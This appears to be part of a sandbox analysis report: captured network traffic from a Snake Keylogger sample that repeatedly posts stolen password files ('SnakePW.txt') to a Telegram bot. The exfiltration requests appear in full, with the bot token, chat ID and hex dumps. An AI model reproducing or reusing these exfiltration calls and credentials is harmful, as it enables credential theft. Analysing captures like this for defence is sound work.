                                                                    2022-06-26 07:34:49 UTC517OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 37 63 66 37 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571d7cf778Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:49 UTC517INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:49 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:49 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67094,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228889,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    307192.168.2.550241149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:49 UTC518OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571dd52e6f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:49 UTC518OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 64 64 35 32 65 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571dd52e6fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:49 UTC519INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:49 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:49 UTC519INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67095,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228889,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    308192.168.2.550242149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:50 UTC520OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571e10c94e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:50 UTC520OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 31 30 63 39 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571e10c94eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:50 UTC520INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:50 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:50 UTC521INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67096,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228890,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    309192.168.2.550243149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:50 UTC521OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571e4a018c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:50 UTC522OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 34 61 30 31 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571e4a018cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:50 UTC522INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:50 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:50 UTC523INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67097,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228890,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    31192.168.2.549801149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:51 UTC52OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756dbd4e751
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:51 UTC52OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 62 64 34 65 37 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756dbd4e751Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:51 UTC53INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:51 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:51 UTC53INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66778,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228771,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    310192.168.2.550244149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:50 UTC523OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571e833a3a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:50 UTC523OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 38 33 33 61 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571e833a3aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:51 UTC524INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:51 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:51 UTC524INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67098,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228891,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    311192.168.2.550245149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:51 UTC525OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571ebc7253
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:51 UTC525OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 65 62 63 37 32 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57571ebc7253Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:51 UTC526INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:51 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:51 UTC526INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 39 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67099,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228891,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    312192.168.2.550247149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:51 UTC526OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57571ef80d03
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
